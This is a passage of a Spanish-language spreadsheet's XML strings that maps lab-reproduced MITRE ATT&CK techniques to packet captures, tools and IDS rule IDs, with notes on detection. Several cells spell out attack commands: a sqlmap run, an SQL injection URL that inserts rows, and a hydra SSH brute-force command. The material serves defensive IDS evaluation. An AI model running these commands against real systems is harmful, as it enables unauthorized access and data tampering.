    <t>External Remote Services</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>Acceso a red VPN desde dispositivo no autorizado con credenciales robadas</t>
  </si>
  <si>
    <t>OpenVPN</t>
  </si>
  <si>
    <t>T1133-External_remote_services_[4].pcapng</t>
  </si>
  <si>
    <t>NO***</t>
  </si>
  <si>
    <t xml:space="preserve">Existen varias variantes.
        Circunstancias concretas del ataque: el atacante realiza alguna interacción posterior una vez ha logrado acceder a la red (aplicable a esta técnica) como un escaneo de red o mensajes de anuncio de Host.
        Reglas personalizadas: regla que compruebe si las direcciones IP involucradas en los paquetes se corresponden con las autorizadas dentro de la red VPN (debe ser configurada manualmente).
</t>
  </si>
  <si>
    <t>Acceso a red VPN, sin interacciones adicionales más allá de las naturales al propio acceso</t>
  </si>
  <si>
    <t>Manual [4] /  3.3</t>
  </si>
  <si>
    <t>Manual [4] / B.3</t>
  </si>
  <si>
    <t>Manual [4] / 4.3</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611, 2101620, 2100527, 2002749, 2001117, 2101917</t>
    </r>
  </si>
  <si>
    <t>2101917, 2002749, 2100527, 2101620, 2001117</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611</t>
    </r>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Inyección SQL</t>
  </si>
  <si>
    <t>Sqlmap</t>
  </si>
  <si>
    <t>T1190-Sql_inyection1_[3].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte un posible intento al esquema de informacion de un servidor MySQL. Regla que detecte una sentencia SQL pudiendose tratar de una posible inyeccion SQL. Regla que detecte posible escaneo de vulnerabilidades de inyeccion SQL.</t>
  </si>
  <si>
    <t>Ejecucion de comando mediante sqlmap para probar diferentes SQL Injections a una página web. Comando: sqlmap -u http://192.168.2.2/payroll_app.php --forms --batch --passwords</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.5</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.5.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.5.5</t>
  </si>
  <si>
    <t>2002752, 2002749, 50447</t>
  </si>
  <si>
    <t>T1190-Sql_inyection2_[2].pcapng</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.3.1</t>
  </si>
  <si>
    <t>Manual [4] / B.28</t>
  </si>
  <si>
    <t>Manual [2] / 4.1.1.2</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 1122, 1147</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 1122, 1147</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2017808, 2009815, 2009714, 2006446, 2006445</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2008538, 1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 1122, 1147</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2017808, 2009815, 2009714, 2006446, 2006445</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2008538, 1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 1122, 1147</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2017808, 2009815, 2009714, 2006446, 2006445, 2008538, 1061, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">1122, 1147, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">19779, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">31939, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>7070</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2017808,2009815,2009714,2006446,2006445,2008538,1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1122,1147</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,19779</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,31939,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>7070</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749, 2012885,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2101061, 2017808, 2009815, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009714,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2006446, 2006445, 2008538, 1061, 1</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>122, 1147, 19779, 50447, 31939, 7070</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2012885</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101061, 2017808, 2009815, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009714,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2006446, 2006445, 2008538, 1061, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1122, 1147, 19779, 50447, 31939, 7070</t>
    </r>
  </si>
  <si>
    <t>FG - Las dos primeras inyecciones SQL generan una alerta, el resto 2</t>
  </si>
  <si>
    <t>46199, 15621</t>
  </si>
  <si>
    <t>Damn Vulnerable Web App (DVWA)</t>
  </si>
  <si>
    <t>T1190-Sql_injection-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>NO*</t>
  </si>
  <si>
    <t>Regla personalizada que detecte posibles cadenas asociadas a un ataque de inyección SQL en sentencias HTML</t>
  </si>
  <si>
    <t>Manual [4] / B.34</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>HTML Exploit I - HTML Compilador</t>
  </si>
  <si>
    <t>Apache, Shadyantra</t>
  </si>
  <si>
    <t>T1189-Drive-by_compromise_v1_[4].pcapng</t>
  </si>
  <si>
    <t>NO**</t>
  </si>
  <si>
    <t>La detección de esta técnica será más o menos viable dependiendo del objetivo y método del atacante. Si el foco está fijado en la obtención de credenciales, si el ataque está elaborado resulta prácticamente imposible su detección. En caso de que se busque un acceso a la red de manera directa mediante ejecutables y/o malware, el tipo de contenido marcará su grado de detección.</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para compilar código malware (no ejecutar)</t>
  </si>
  <si>
    <t>Manual [4] /  3.4</t>
  </si>
  <si>
    <t>Manual [4] / B.4</t>
  </si>
  <si>
    <t>Manual [4] / 4.4</t>
  </si>
  <si>
    <t>HTML Exploit II - Descarga de Ejecutable</t>
  </si>
  <si>
    <t>T1189-Drive-by_compromise_v2_[4].pcapng</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para descargar malware en formato ejecutable .exe</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Añadir hardware</t>
  </si>
  <si>
    <t>SSH Server + USB(Simular USB con MV con SO)</t>
  </si>
  <si>
    <t>T1200-Hardware_Additions_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique desviaciones en el tráfico de red, tales como metadatos o protocolos de gestión (DHCP,...) fuera de los habituales</t>
  </si>
  <si>
    <t>Aparición de una nueva MV en el entorno de la víctima simulando la insercion de un USB tipo Pwn Plug que se utiliza como nodo de acceso a la red de la víctima para posteriormente, aprovechando que el puerto de la víctima esta abierto, acceder al equipo.</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.2.1</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Envío de emails con documentos maliciosos</t>
  </si>
  <si>
    <t>T1566.001-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Si los mensajes contienen determinados patrones como intentos de creación de Shells remotos sí que pueden ser detectados porl los cortafuegos en base a reglas que detecten cadenas específicas en los paquetes</t>
  </si>
  <si>
    <t>1292, 46983</t>
  </si>
  <si>
    <t>1292, 46983, 47398</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1292</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2002749, 2002752, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101292, 46983, 47398</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1292</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2002749, 2002752, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101292, 46983, 47398</t>
    </r>
  </si>
  <si>
    <t>29247, 12449</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Obtener un acceso inicial mediante ingeniería social utilizando un enlace adjunto en un correo que descargue un fichero que establezca una sesión al equipo víctima</t>
  </si>
  <si>
    <t>SEToolKit, Metasploit</t>
  </si>
  <si>
    <t>T1566.002-Spearphishing_Link_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con enlaces maliciosos que contengan contenido malware</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.2.2</t>
  </si>
  <si>
    <t>2002752,2002749,2001117</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Content Injection</t>
  </si>
  <si>
    <t>T1659</t>
  </si>
  <si>
    <t>Realizar una suplantación de identidad DHCP, saturando el servidor DHCP verdadero para que el servidor DHCP del atacante procese las consultas de un usuario. Posteriormente se manipula alguna consulta inyectando contenido malicioso</t>
  </si>
  <si>
    <t>dhcpstarv, Metasploit</t>
  </si>
  <si>
    <t>T1659-Content_Injection_[5].pcapng</t>
  </si>
  <si>
    <t>La detección de esta técnica será más o menos viales dependiendo del objetivo y método del atacante. Si el ataque se realiza en conjunto con protocolos de gestion(DHCP) dificultará la detección. Resultará necesario monitorizar por la distribución a traves del tráfico de red de archivos malware</t>
  </si>
  <si>
    <t>Suplantacion de identidad de DHCP Server para posteriormente inyectar contenido en la víctima con malware</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.2.3</t>
  </si>
  <si>
    <t>2100527, 2002752, 2002749</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100527</t>
  </si>
  <si>
    <t>Inyección</t>
  </si>
  <si>
    <t>Suite aircrack-ng</t>
  </si>
  <si>
    <t>T1659_Inyeccion_[1].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías, paquetes sospechosos de haber sido generados aleatoriamente y sin correlación con las comunicaciones establecidas. </t>
  </si>
  <si>
    <t>Manual [1] /  2.5.1.1.4</t>
  </si>
  <si>
    <t>Manual [1] / E.23</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Uso de una conexión RDP sin proteger para el acceso a un equipo</t>
  </si>
  <si>
    <t>RDP</t>
  </si>
  <si>
    <t>T1199-Trusted_relationship_[4].pcapng</t>
  </si>
  <si>
    <t>SI*</t>
  </si>
  <si>
    <t xml:space="preserve">El ataque tiene un matiz clave. Si bien el ataque puede ser detectado por Snort (existen muchas variantes, aunque para esta instancia concreta, por ejemplo, sí que existe mecanismo de detección), el hecho de que se trate de un ataque procedente de un dominio de confianza infectado, dificulta su detección, pues bloquear estos paquetes podría imposibilitar comunicación con el dominio de confianza si no existiera amenaza </t>
  </si>
  <si>
    <t>Manual [4] /  3.5</t>
  </si>
  <si>
    <t>Manual [4] / B.5</t>
  </si>
  <si>
    <t>Manual [4] / 4.5</t>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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FF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034857</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">,  2101448,  2101447,  </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001329,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">  2001330,  2009207,  2009206,  2009205,  2009208,  2002752,  2002749,  1448</t>
    </r>
  </si>
  <si>
    <t>2002752, 2009205, 2009206, 2009207, 2009208, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034857</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101448, 2101447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001329</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2001330, 1448</t>
    </r>
  </si>
  <si>
    <t>TA0003</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Instalación de Plugin en Navegador Chrome que reenvía información relacionada con búsquedas del usuario a un servidor</t>
  </si>
  <si>
    <t>Malicious-browser-extension</t>
  </si>
  <si>
    <t>T1176-Browser-extension_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en flujos de datos hacia direcciones no relacionadas con las búsquedas, normalmente en formato de objetos JavaScript</t>
  </si>
  <si>
    <t>Manual [4] /  3.7</t>
  </si>
  <si>
    <t>Manual [4] / B.7</t>
  </si>
  <si>
    <t>Manual [4] / 4.7</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, 2101917, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101620</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101620, 2002749, 2101917</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>Establecimiento de tarea BITS en equipo Windows para garantizar persistencia trás reinicio del equipo</t>
  </si>
  <si>
    <t>BITSADMIN,METASPLOIT</t>
  </si>
  <si>
    <t>T1197-BITS_Jobs_[5].pcapng</t>
  </si>
  <si>
    <t>Se pueden monitorizar conexiones nuevas generadas por BITS</t>
  </si>
  <si>
    <t>Ejecución de comandos para la creación de una tarea BITS con rastro de red</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.3.1</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t xml:space="preserve">Modificación de imagen de SO mediante la suplantación de un Server TFTP </t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>T1542.005-TFTP_Boot_[5].pcapng</t>
  </si>
  <si>
    <t>**Regla personalizada que comprueba si la IP del servidor TFTP es la del servidor legítimo ** Que el SO enviado por el atacante contenga algun tipo de malware detectable por un IDS</t>
  </si>
  <si>
    <t>Servidor TFTP utilizando Iventoy</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.3.2</t>
  </si>
  <si>
    <t>1444, 2008120, 2008119, 2008118</t>
  </si>
  <si>
    <t>1444, 2008119, 2008118</t>
  </si>
  <si>
    <t>1444, 2100527, 2101444, 2008120, 2002752, 2002749, 2008119, 2008118</t>
  </si>
  <si>
    <t>2002752, 2101444, 2100527, 2008120, 2002749</t>
  </si>
  <si>
    <t>1444, 2008119,2008118</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>None (SQL injection using URL)</t>
  </si>
  <si>
    <t>T1505.001-SQL_inyection_[3].pcapng</t>
  </si>
  <si>
    <t>**Regla genérica que detecte en la petición "%27" que indica la representacion de comillas simples</t>
  </si>
  <si>
    <t>Ejecución de URL en navegador web (http://172.16.2.2:8080/contacto?apellidos=Fernandez%27;%20INSERT%20INTO%20contactos%20values%20(3,%20%27Atacante%27,%20%27Atacante%27,%20%27Atacante%27,%20100)--)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.7</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.7.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.7.5</t>
  </si>
  <si>
    <t>2011039, 2006444</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>13513</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438, 2011039, 2006444</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>13513</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438, 2011039, 2006444</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, 2100472, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2011039, 2006444, 13513,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438</t>
    </r>
  </si>
  <si>
    <t>2002752, 2100472, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2011039, 2006444, 13513,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438</t>
    </r>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Shell Web</t>
  </si>
  <si>
    <t>Metasploit</t>
  </si>
  <si>
    <t>T1505.005-Shell_Web_[2].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecta el intento de escaneo para comprobar la existencia de backdoor. </t>
  </si>
  <si>
    <t>El ataque busca aprovechar configuracion vulnerable de un servidor WampServer que permite subir y borrar contenido web mediante el uso de HTTP PUT y HTTP DELETE.
Se realiza la subida de un payload a un servidor web</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.5.1</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50202</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50202</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, 2006408, 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182, 50202</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2006408, 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182, 50202</t>
    </r>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>TA0006</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Obtención de contraseña por fuerza bruta (adivinación)</t>
  </si>
  <si>
    <t>T1110.001-Hydra_[3].pcapng</t>
  </si>
  <si>
    <t>Obtener la contraseña para conectarse por SSH al equipo victima mediante fuerza bruta. Comando:  hydra -l dit -P pass.txt 172.16.2.2 -t 4 ssh</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.9</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.9.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.9.5</t>
  </si>
  <si>
    <t>FTP - Patator</t>
  </si>
  <si>
    <t>T1110.001-FTP-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un elevado número de intentos de acceso a un servicio</t>
  </si>
  <si>
    <t>Manual [4] / B.32</t>
  </si>
  <si>
    <t>2002749, 2002752</t>
  </si>
  <si>
    <t>SSH - Patator</t>
  </si>
  <si>
    <t>T1110.001-SSH-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Manual [4] / B.33</t>
  </si>
  <si>
    <t>650, 2003068, 2001219</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">650, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
